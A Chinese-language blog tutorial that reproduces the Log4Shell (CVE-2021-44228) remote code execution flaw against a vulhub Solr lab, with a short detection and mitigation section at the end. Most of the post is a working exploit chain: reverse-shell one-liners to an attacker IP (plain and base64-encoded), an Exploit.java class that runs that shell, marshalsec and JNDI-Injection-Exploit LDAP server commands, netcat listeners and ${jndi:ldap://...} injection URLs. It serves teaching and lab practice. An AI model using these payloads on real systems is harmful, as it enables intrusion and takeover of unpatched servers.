log4j2远程代码执行漏洞原理与漏洞复现（基于vulhub，保姆级的详细教程）

落日映苍穹つ 2023-09-26 20:08 63阅读 0赞

## 漏洞原理 ##

#### 啥是log4j2? ####

log4j2是apache下的java应用常见的开源日志库，是一个就Java的日志记录工具。在log4j框架的基础上进行了改进，并引入了丰富的特性，可以控制日志信息输送的目的地为控制台、文件、GUI组建等，被应用于业务系统开发，用于记录程序输入输出日志信息。

#### 啥是JNDI？ ####

由于漏洞利用会涉及到JNDI注入相关的知识，这里简要做一个对JNDI的介绍。

JNDI，全称为**Java命名和目录接口**（Java Naming and Directory Interface）,是SUN公司提供的一种标准的Java命名系统接口，**允许从指定的远程服务器获取并加载对象**。**JNDI相当于一个用于映射的字典，使得Java应用程序可以和这些命名服务和目录服务之间进行交互。**JNDI注入攻击时常用的就是通过RMI和LDAP两种服务，本文以LDAP服务为例进行复现。

#### **log4j2远程代码执行漏洞原理** ####

**cve编号：**CVE-2021-44228

log4j2框架下的lookup查询服务提供了\{\}字段解析功能，传进去的值会被直接解析。例如$\{java:version\}会被替换为对应的java版本。这样如果不对lookup的出栈进行限制，就有可能让查询指向任何服务（可能是攻击者部署好的恶意代码）。

攻击者可以利用这一点进行JNDI注入，使得受害者请求远程服务来链接本地对象，在lookup的\{\}里面构造payload，调用JNDI服务（LDAP）向攻击者提前部署好的恶意站点获取恶意的.class对象，造成了远程代码执行（可反弹shell到指定服务器）。

画个简单点的漏洞利用示意图，如下：

![67d0d0bb9ba845ab875ca6a13b242f69.png][]

尽可能画的详细一点，大概是下图。

![a9c5c70d97844b48a393c1d81c658e41.png][]

攻击者构造payload，在JNDI接口lookup查询进行注入，payload为$\{jndi:ldap:恶意url/poc\}，JNDI会去对应的服务（如LDAP、RMI、DNS、文件系统、目录服务…本例为ldap）查找资源，由于lookup的出栈没做限制，最终指向了攻击者部署好的恶意站点，下载了远程的恶意class，最终造成了远程代码执行rce。

## 靶场搭建 ##

靶机：Ubuntu 192.168.200.129（无所谓是不是Ubuntu，随便找个地方用docker启动就行）

用vulhub靶场搭建，首先进入目录CVE-2021-44228中，docker启动命令：

docker-compose up –d

![774ae0e100e54227970984771f6d806e.png][]

查看一下端口：

Docker-compose up -d

![22f2705c8ae646bf942a40f54b44421c.png][]

发现端口是8983，浏览器访问http://192.168.200.129:8983/

![c5e1ed6a29a94f7189241dc2fb0aeb63.png][]

## 漏洞检测 ##

用dnslog平台检测dns回显，看看有没有漏洞存在，网址为：[DNSLog Platform][]

![947f75915a6749cf927f9b613c8a6353.png][]

点击Get SubDomin获取一个子域名，我这里是3dto27.dnslog.cn

![372f4807f457468dbd0bb8fadaa9d83d.png][]

在/solr/admin/cores?有个参数可以传，这就是个注入点，我们试试能不能输出java版本，构造payload，访问的url如下：

[http://192.168.200.129:8983/solr/admin/cores?action=$\{jndi:ldap://$\{sys:java.version\}.3dto27.dnslog.cn \}][http_192.168.200.129_8983_solr_admin_cores_action_jndi_ldap_sys_java.version_.3dto27.dnslog.cn]

注意别忘了将url中的ip改为靶机ip,注入部分中的3dto27.dns.log.cn改为你在Get SubDomin获取的子域名。如果存在log4j2漏洞，我们将在DNSLog平台看到回显。

![27f6739ba3274751985e02833d5da2b5.png][]

返回刚才的DNSLog平台，点击刷新记录Refresh Record（可能比较慢，不要着急，可以多点几次Refresh Record），可以看到有数据：在DNS Query Record一栏下面出现了条目，回显了java版本1.8.0\_102，说明存在log4j漏洞。

![485761768b41465a8549c9e392906647.png][]

## 漏洞利用（获取反弹shell） ##

我第一次复现的时候，直接用了JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar或JNDIExploit-1.4-SNAPSHOT.jar，可以在github上搜一下（后文会介绍），但我写博客的时候考虑到用这种工具感觉像是一键复现漏洞，对漏洞利用的每个步骤好像并不是很明确，所以我们还是先不用这种方法，还是老老实实自己编写一下恶意代码，启动一下恶意的http服务站点和LDAP服务，完整的演示一下过程。

靶机：Ubuntu 192.168.200.129 （随便找个地方用docker搭一下就行）

攻击机： kali 192.168.200.131 （无所谓是不是kali，windows都行）

### 方法一：编写恶意文件 ###

我们先编写以下的恶意文件Exploit.java，我们企图反弹shell到kali（ip为192.168.200.131）的7777端口，因此对应的bash命令为：

bash -i >& /dev/tcp/192.168.200.131/7777 0>&1

然后对上述命令进行base64编码，这里给出一个网站，可以直接进行payload的编码：[Runtime.exec Payload Generater | AresX's Blog (ares-x.com)][Runtime.exec Payload Generater _ AresX_s Blog _ares-x.com]

![6d5e25c55d1341aa950a5f9253d89adf.png][]

编码结果为：

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMzEvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}

好的，有了编码结果，我们就可以编写恶意文件了，编写以下代码命名为Exploit.java。

import java.lang.Runtime;
    import java.lang.Process;
    public class Exploit {
         public Exploit(){
                 try{
                     Runtime.getRuntime().exec("/bin/bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMzEvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}");
                                    }catch(Exception e){
                                                e.printStackTrace();
                                                 }
                    }
             public static void main(String[] argv){
                             Exploit e = new Exploit();
                                }
    }

然后我们把Exploit.java编译为Exploit.class，最好保证javac的版本为1.8。命令如下：

javac Exploit.java

我是在物理机中编译的，编译完成之后的.class文件立即被windows安全中心的病毒和威胁防护功能给干掉了，需要还原一下（手动狗头）。把编译好的Exploit.class放到攻击机kali的随便一个目录下：

![cf6dfcc3208c4dd88fcfe1492f08e54e.png][]

并在此目录开启http服务，我这里把端口设置为了4444，命令如下：

python -m http.server 4444

![779e548abb3f4dd3964b45d594c70517.png][]

然后浏览器访问攻击机ip:端口，我这里为192.168.200.131:4444 ，应该可以看到一个目录：

![e9d9ac067130427eb4d62639483e22df.png][]

读者只要保证你的站点目录里有Exploit.class就行，至于我目录里有啥其他的读者不用在意。接下来，我们在攻击机启动LDAP服务。这里使用工具marshalsec-0.0.3-SNAPSHOT-all.jar来快速开启，这个工具在我的上一篇博客中有提到，详情见

[(56条消息) Fastjson反序列化漏洞原理与漏洞复现（基于vulhub，保姆级的详细教程）\_Bossfrank的博客-CSDN博客][56_ Fastjson_vulhub_Bossfrank_-CSDN]

下载链接为[marshalsec-0.0.3-SNAPSHOT-all.jar][]，下载完之后用mvn clean package -DskipTests生成.jar文件。在上一篇博客中，我们是用这个工具建立了RMI 服务，这次我们是要用这个工具建立LDAP服务。

好了，废话说完了，现在我们在攻击机marshalsec-0.0.3-SNAPSHOT-all.jar所在目录开启LDAP监听，命令中的1389为LDAP服务的端口，你也可以换成别的端口。

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer  "http://刚才http服务的地址:端口号/#Exploit" 1389

本例中的命令为：

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer  "http://192.168.200.131:4444/#Exploit" 1389

![0ecbfa07d95c4a19bfce1f89edc014b1.png][]

接着在攻击机另起一个终端，监听之前Exploit.java里面写的反弹shell的端口7777，命令为：

nc -lvvp 7777

![6100c9c82a1c4dbe8a236501d7557e93.png][]

最后一步，也是最关键的一步，进行JNDI注入，我们在注入点/solr/admin/cores?action构造一个JNDI注入如下：

$\{jndi:ldap://192.168.200.131:1389/Exploit\}

完整的url为：

http://192.168.200.129:8983/solr/admin/cores?action=${jndi:ldap://192.168.200.131:1389/Exploit}

也可以用Burp抓包改包，但由于是get请求，直接输入url就行了。

[http://192.168.200.129:8983/solr/admin/cores?action=$\{jndi:ldap://192.168.200.131:1389/Exploit\}][http_192.168.200.129_8983_solr_admin_cores_action_jndi_ldap_192.168.200.131_1389_Exploit]

访问上述url（别忘了把第一个ip改为靶机ip，第二个ip改为之前建立的LDAP服务的地址:端口号），应该就成功了，访问的页面回显如下：

![0888f5f93fd540a5a1756c7789e44ca5.png][]

攻击机启动的LDAP服务的终端显示如下：

![f08faa6fcd9d4f56a551ef5ff758cb58.png][]

攻击机开启的HTTP服务的终端显示如下：

![a3a17356a1494e2fb54c05bc2ea21478.png][]

可以看到最后两条日志信息，靶机已经通过GET方法请求了我们的恶意代码Exploit.class，状态码为200，成功响应，此时应该已经实现了RCE远程代码执行。我们查看对7777端口进行监听的终端，成功获取了shell:

![d9589abd39804c6dbc25ecfa73a50f5e.png][]

已经可以在攻击机执行任何代码了：

![9d1077308f6048ec865f08d2f9cf0c19.png][] 这样就实现了攻击，复现了log4j的远程代码执行漏洞。

复现成功之后别忘了用如下命令关闭靶场。

docker-compose down

### 方法二：直接利用现成的JNDI注入工具 ###

这种方法更为便捷，属于是一键部署了。用到的工具为JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar，项目地址：[sayers522/JNDI-Injection-Exploit: JNDI命令注入利用 (github.com)][sayers522_JNDI-Injection-Exploit_ JNDI_ _github.com]

下载之后还要用maven生成.jar可执行文件，在pom.xml目录下运行：mvn clean package -DskipTests 如果没有mvn，参阅

[(51条消息) 史上最全安装Maven教程\_安装mvnw\_小Du猿的博客-CSDN博客][51_ _Maven_mvnw_Du_-CSDN]

如果build成功，会生成一个target目录，里面会有JNDI-Injection-Exploit-1.0-SNAPSHOT-.jar

![8bc3c62b198d42768ac8a4065757a2a6.png][]

使用这个工具，我们就不用自己编写恶意代码.class再上传服务器了，直接用这个工具输入对应的命令就行了。

与方法一类似，我们的目标是反弹shell到目标端口，反弹shell的命令为：bash -i >& /dev/tcp/传反弹shell的主机ip/端口号 0>&1

本例为（一会我们会在攻击机的一个终端监听6666端口）：

bash -i >& /dev/tcp/192.168.200.131/6666 0>&1

还是要对这个命令进行base64编码，网址再贴一遍：

[Runtime.exec Payload Generater | AresX's Blog (ares-x.com)][Runtime.exec Payload Generater _ AresX_s Blog _ares-x.com]

编码后的结果为：

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMzEvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}

![765bcbacd7994f50a5f8bcbbfed8c7db.png][]

然后我们利用JNDI注入工具把这个反弹shell命令部署到LDAP服务上去，在JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar所在目录运行如下命令：

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "构造反弹shell的命令的base64编码" -A "攻击机ip"

本例为：

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4xMzEvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.200.131"

运行之后的终端显示如下：

![cc1b79165665450b8d97faf3daba4103.png][]

可以看到，这里已经一键部署好了RMI和LDAP服务的站点，并给出了路径，JDK1.8的版本为ldap://192.168.200.131:1389/Exploit，JDK1.7的版本为：ldap://192.168.200.131:1389/Exploit7 。这两个任选一个都行。

然后再打开一个终端，监听一个端口，本例监听的是6666（前面的反弹shell命令写的就是6666）：

nc –lvvp 6666

![49b7f44f5beb45bd8b36a79f0116b3b7.png][]

最后一步和方法一一样，构造payload，由于是GET方式，浏览器访问以下任意一个url即可：

http://192.168.200.129:8983/solr/admin/cores?action=$\{jndi:ldap://192.168.200.131:1389/Exploit\}

http://192.168.200.129:8983/solr/admin/cores?action=$\{jndi:ldap://192.168.200.131:1389/Exploit7\}

用rmi应该也行：

http://192.168.200.129:8983/solr/admin/cores?action=$\{rmi:ldap://192.168.200.131:1099/Exploit\}

http://192.168.200.129:8983/solr/admin/cores?action=$\{rmi:ldap://192.168.200.131:1099/Exploit7\}

这里以访问LDAP的Exploit为例:

![6820cc1d32ae4aa2891437d6e341a9c9.png][]

JNDI注入工具的终端显示如下：

![e13fb76e70d64a208f3e68a087ea857c.png][]

打开刚才监听的终端，成功获取了反弹shell：

![523fd67a8b0a4e84b3d742193090492b.png][]

此时已经可以执行任意命令了：

![2a02de4ebc5949f48813420ec5025dea.png][]这样就利用JNDI注入工具实现了攻击，复现了log4j的远程代码执行漏洞。

复现成功之后别忘了用如下命令关闭靶场。

docker-compose down

也可以使用其他的注入工具，如JNDIExploit-1.4-SNAPSHOT.jar ，Github链接：[WhiteHSBG/JNDIExploit: 对原版https://github.com/feihong-cs/JNDIExploit 进行了实用化修改][WhiteHSBG_JNDIExploit_ _https_github.com_feihong-cs_JNDIExploit]

这个工具是在攻击机的对应目录运行：

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 攻击机ip

![9ba50f265bf441dfb0ad10545b7f72dd.png][]

然后监听个端口7777，再浏览器访问

http://192.168.200.129:8983/solr/admin/cores?action=$\{jndi:ldap://192.168.200.131:1389/Basic/ReverseShell/192.168.200.131/7777\}

之后就获得shell了。

![1a1c2d32627148bba89d050e66d94bac.png][]

如下图，攻击成功。

![f66426cfcc144f949748e6f67137245d.png][]

## 结语 ##

log4j2是2021年底爆出的非常严重的漏洞，可谓是风靡一时，“血洗互联网”，也是安全公司面试的常见题目，我们应该了解这个漏洞的原理及利用方式。

**如何排查是否受到了攻击？**

检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为，前面复现的过程在payload的构造中都出现了这样的字符串，这是攻击的典型标志。

**如何对log4j2的攻击进行防御？**  
1.设置log4j2.formatMsgNoLookups=True。相当于直接禁止lookup查询出栈，也就不可能请求到访问到远程的恶意站点。  
2.对包含有"jndi:ldap://"、"jndi:rmi//"这样字符串的请求进行拦截，即拦截JNDI语句来防止JNDI注入。  
3.对系统进行合理配置，禁止不必要的业务访问外网，配置网络防火墙,禁止系统主动外连网络等等。  
4.升级log4j2组件到新的安全的版本。

这是我的第二篇CSDN博客，希望以后能坚持多写写网络安全相关的文章，还望读者们多多关注，多多支持。如果有什么问题，欢迎评论区讨论。

最后我在b站上看了一个对此漏洞进行复现的视频，讲的挺清楚的，这里给个链接吧：

[【面试必问】Log4j漏洞复现及原理刨析，简单易懂\_哔哩哔哩\_bilibili][Log4j_bilibili]

[67d0d0bb9ba845ab875ca6a13b242f69.png]: https://img-blog.csdnimg.cn/67d0d0bb9ba845ab875ca6a13b242f69.png
[a9c5c70d97844b48a393c1d81c658e41.png]: https://img-blog.csdnimg.cn/a9c5c70d97844b48a393c1d81c658e41.png
[774ae0e100e54227970984771f6d806e.png]: https://img-blog.csdnimg.cn/774ae0e100e54227970984771f6d806e.png
[22f2705c8ae646bf942a40f54b44421c.png]: https://img-blog.csdnimg.cn/22f2705c8ae646bf942a40f54b44421c.png
[c5e1ed6a29a94f7189241dc2fb0aeb63.png]: https://img-blog.csdnimg.cn/c5e1ed6a29a94f7189241dc2fb0aeb63.png
[DNSLog Platform]: http://dnslog.cn/
[947f75915a6749cf927f9b613c8a6353.png]: https://img-blog.csdnimg.cn/947f75915a6749cf927f9b613c8a6353.png
[372f4807f457468dbd0bb8fadaa9d83d.png]: https://img-blog.csdnimg.cn/372f4807f457468dbd0bb8fadaa9d83d.png
[http_192.168.200.129_8983_solr_admin_cores_action_jndi_ldap_sys_java.version_.3dto27.dnslog.cn]: http://192.168.200.129:8983/solr/admin/cores?action=$%7Bjndi:ldap://$%7Bsys:java.version%7D.3dto27.dnslog.cn%20%7D
[27f6739ba3274751985e02833d5da2b5.png]: https://img-blog.csdnimg.cn/27f6739ba3274751985e02833d5da2b5.png
[485761768b41465a8549c9e392906647.png]: https://img-blog.csdnimg.cn/485761768b41465a8549c9e392906647.png
[Runtime.exec Payload Generater _ AresX_s Blog _ares-x.com]: https://ares-x.com/tools/runtime-exec
[6d5e25c55d1341aa950a5f9253d89adf.png]: https://img-blog.csdnimg.cn/6d5e25c55d1341aa950a5f9253d89adf.png
[cf6dfcc3208c4dd88fcfe1492f08e54e.png]: https://img-blog.csdnimg.cn/cf6dfcc3208c4dd88fcfe1492f08e54e.png
[779e548abb3f4dd3964b45d594c70517.png]: https://img-blog.csdnimg.cn/779e548abb3f4dd3964b45d594c70517.png
[e9d9ac067130427eb4d62639483e22df.png]: https://img-blog.csdnimg.cn/e9d9ac067130427eb4d62639483e22df.png
[56_ Fastjson_vulhub_Bossfrank_-CSDN]: https://blog.csdn.net/Bossfrank/article/details/130100893
[marshalsec-0.0.3-SNAPSHOT-all.jar]: https://github.com/mbechler/marshalsec
[0ecbfa07d95c4a19bfce1f89edc014b1.png]: https://img-blog.csdnimg.cn/0ecbfa07d95c4a19bfce1f89edc014b1.png
[6100c9c82a1c4dbe8a236501d7557e93.png]: https://img-blog.csdnimg.cn/6100c9c82a1c4dbe8a236501d7557e93.png
[http_192.168.200.129_8983_solr_admin_cores_action_jndi_ldap_192.168.200.131_1389_Exploit]: http://192.168.200.129:8983/solr/admin/cores?action=$%7Bjndi:ldap://192.168.200.131:1389/Exploit%7D
[0888f5f93fd540a5a1756c7789e44ca5.png]: https://img-blog.csdnimg.cn/0888f5f93fd540a5a1756c7789e44ca5.png
[f08faa6fcd9d4f56a551ef5ff758cb58.png]: https://img-blog.csdnimg.cn/f08faa6fcd9d4f56a551ef5ff758cb58.png
[a3a17356a1494e2fb54c05bc2ea21478.png]: https://img-blog.csdnimg.cn/a3a17356a1494e2fb54c05bc2ea21478.png
[d9589abd39804c6dbc25ecfa73a50f5e.png]: https://img-blog.csdnimg.cn/d9589abd39804c6dbc25ecfa73a50f5e.png
[9d1077308f6048ec865f08d2f9cf0c19.png]: https://img-blog.csdnimg.cn/9d1077308f6048ec865f08d2f9cf0c19.png
[sayers522_JNDI-Injection-Exploit_ JNDI_ _github.com]: https://github.com/sayers522/JNDI-Injection-Exploit
[51_ _Maven_mvnw_Du_-CSDN]: https://blog.csdn.net/weixin_44985115/article/details/115253160
[8bc3c62b198d42768ac8a4065757a2a6.png]: https://img-blog.csdnimg.cn/8bc3c62b198d42768ac8a4065757a2a6.png
[765bcbacd7994f50a5f8bcbbfed8c7db.png]: https://img-blog.csdnimg.cn/765bcbacd7994f50a5f8bcbbfed8c7db.png
[cc1b79165665450b8d97faf3daba4103.png]: https://img-blog.csdnimg.cn/cc1b79165665450b8d97faf3daba4103.png
[49b7f44f5beb45bd8b36a79f0116b3b7.png]: https://img-blog.csdnimg.cn/49b7f44f5beb45bd8b36a79f0116b3b7.png
[6820cc1d32ae4aa2891437d6e341a9c9.png]: https://img-blog.csdnimg.cn/6820cc1d32ae4aa2891437d6e341a9c9.png
[e13fb76e70d64a208f3e68a087ea857c.png]: https://img-blog.csdnimg.cn/e13fb76e70d64a208f3e68a087ea857c.png
[523fd67a8b0a4e84b3d742193090492b.png]: https://img-blog.csdnimg.cn/523fd67a8b0a4e84b3d742193090492b.png
[2a02de4ebc5949f48813420ec5025dea.png]: https://img-blog.csdnimg.cn/2a02de4ebc5949f48813420ec5025dea.png
[WhiteHSBG_JNDIExploit_ _https_github.com_feihong-cs_JNDIExploit]: https://github.com/WhiteHSBG/JNDIExploit
[9ba50f265bf441dfb0ad10545b7f72dd.png]: https://img-blog.csdnimg.cn/9ba50f265bf441dfb0ad10545b7f72dd.png
[1a1c2d32627148bba89d050e66d94bac.png]: https://img-blog.csdnimg.cn/1a1c2d32627148bba89d050e66d94bac.png
[f66426cfcc144f949748e6f67137245d.png]: https://img-blog.csdnimg.cn/f66426cfcc144f949748e6f67137245d.png
[Log4j_bilibili]: https://www.bilibili.com/video/BV1fT411P7Tu